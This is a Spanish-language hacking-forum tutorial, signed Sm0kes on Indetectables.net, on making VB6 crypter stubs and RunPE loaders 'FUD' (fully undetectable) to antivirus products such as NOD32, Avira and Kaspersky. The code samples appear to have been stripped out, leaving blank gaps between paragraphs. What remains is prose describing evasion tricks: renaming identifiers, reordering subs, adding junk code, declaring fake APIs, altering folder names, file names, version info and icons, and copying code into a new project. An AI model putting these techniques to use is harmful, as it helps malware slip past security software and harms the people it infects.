Muchos de los casos nosotros usamos variables como son las siguientes



Pero lo que no sabemos es que ya muchos de estos son tomadas como firmas para los Avs y por ende son detectadas… ahora en el caso de obviar eso podemos poner algunos valores no muy obvios como lo son en el ejemplo anterior sino como este



Ahora yo no te pido que hagas exactamente como lo acabo de poner solo puse asi como referencia sobre lo que trato de decir… con solo esto puedes quitar muchos avs ahora si te es molestoso trabajar asi pues simplemente pones tus variables normales y al final cuando ya hayas acabado puedes presionar [Ctrl + F] y reemplazar todos por la nueva variable…



Reemplazando Funciones:

Para hacer esto es simplemente buscar alternativas sobre funciones que tengan el mismo proposito un ejemplo muy visto es al momento de hacer un buffer cuando vamos a sacar datos de un archivo esto me sirvio cuando queria tratar de sacar al NOD espero que a ustedes tambien



Modificamos el buffer de la siguiente manera serviria igual pero la estructura del codigo cambiaria ahora si deseas puedes usar Lenfile() por LOF() o otra que sepan ;)





Cambiando nombre de Function y Subs:

Esta es otra manera de sacar unos Avs que nos estan molestando en especial aquellos nombres que tiene algo en referencia al diccionario hack xD



Ahora eh visto que RC4 es detectado bueno en mi caso me ah pasado y lo de sAntis tambien para poder sacar algunos Avs en caso de que estas sean detectadas seria cambiarlo de nombre como este




Y milagrosamente algunos saldran jejeje….


Moviendo el orden de los Subs o functions:

Otra manera es tambien moviendo el orden de las Funciones y Subs ya que hay avs que guardan porcion o estructura de un malware y con tan solo moverlo un poco puede desaparecer la deteccion :D


Ejemplo:






Y moviendo el orden un poco quedaria algo asi





Y si escaneamos pueda ser que salieron 1 o 2 Avs :)….


Agregando codigo basura o Junk Code:

En este caso el significado de Codigo basura o en ingles Junk Code es que añadiremos codigos inservibles a nuestro stub como ejemplo tenemos Loops , Variables, String Values, Ifs , Gotos ……..

Dejare algunos ejemplos de como podrian ser ya cada uno puede hacer el suyo o usar los que dejo



Esto puedes ponerlo como Subs o functions pero otro seria agregarlos dentro de uno como este ejemplo




Agregando Fake Apis a sus modulos:

Esta es con la que podemos sacar AVIRA en los RunPE agregando falsos Apis que haran despistar a los avs :D esto sera interesante para muchos ;)

Ejemplo de declaracion de un RunPE



Y ahora poniendo fakes Apis o simplemente Apis de la libreria como los de graficos, de sonido principalmente los que cualquier Av lo vea inofensivo ;)

Ejemplo ya con Apis




Cambiando nombre de la Carpeta:

Esto si toma gran parte de detecciones poner un proyecto dentro de una carpeta llamada 'Stub' esto lo lleva consigo al momento de compilarlo para confirmar esto abran su stub con bloc de notas y veras la ruta del archivo :D asi que como recomendacion pongan un nombre como Windows, Microsoft que se yo usen la imaginacion x]!




Cambiar de nombre a los modulos, Forms, Modulos de Clase y otros:

Es preferibles que no pongan nombre relacionados al hacking y seria mejor poner nombres aleatorios como lo muestro en el siguiente ejempo




Compilando en disco C:

Hay ciertas firmas que son detectadas y aun asi moficiando partes del codigo no ponemos sacarlas en tal caso una solucion seria compilar el proyecto teniendolo en el disco C: de esa manera sacarias a Kaspersky y a otros con el mismo problema :D




Nombre de Compilado:

Es obvio que poniendo como nombre 'Stub.exe' al compilar sea muy detectado por muchos avs la solucion a esto es poniendo un nombre aleatorio en especial uno no reconocible y ya una vez compilado puedes cambiar el nombre a 'Stub.exe'




Modificando Info:

Esto si es efectivo cambiar el nombre de toda la informacion por nombres aleatorios ya que con esto sera compilado y el Av tambien lo tendra en cuenta al momento de escanear…. este seria un ejemplo de como ustedes pueden hacerlo






Y pues obvio cambiar el texto para cada uno de los tipos de informacion como son Comments…. Company Name…..etc (Mi vb6 esta en ingles :D)



Cambiando Icono:

Esto principalmente es para quitarnos de encima al Avira no siempre funcionara pero ya en un tutorial aparte les enseñare a quitar al avira profundamente en especial del encriptado ;)…...


Pasar Nuestro proyecto a uno nuevo:

Ahora si hemos intentado todo esto y si alguno de los Avs siguen detectando nuestro stub o alguna otra aplicacion lo recomendable es cambiar todo el codigo del proyecto a otro que quiero decir con eso simplemente copiar todos los codigos de los forms, modulos, clases de modulos para pegarlos en otros del nuevo proyecto

Ejemplo:





Conclusion:

Hasta el momento que estuve escribiendo fueron todos estos los que me acorde aunque siento haberme olvidado de algunos …. Pero bueno solo espero que a muchos les haya servido este tutorial y si les ayudo en algo porfavor no se olviden de dar creditos ya que esto lo hago por compartir con ustedes lo que eh aprendido y seria algo lammer que esten diciendo que ya lo sabian cuando no fue asi… pero de todas maneras se que talvez algunos ya los saben pero hay muchos que no y esto va dirigido hacia ellos ya sin mas nada que decir solo espero que hagan FUD sus tools y colaboren con la comunidad :D… Salu2..

Tips Finales

En el caso de que sea un Stub nuestro proyecto les recomiendo que por nada del mundo vayan a usar stub como variable o como nombre de algun form simplemente evita el uso de esa palabra

Posteado por Sm0kes en Indetectables.net

"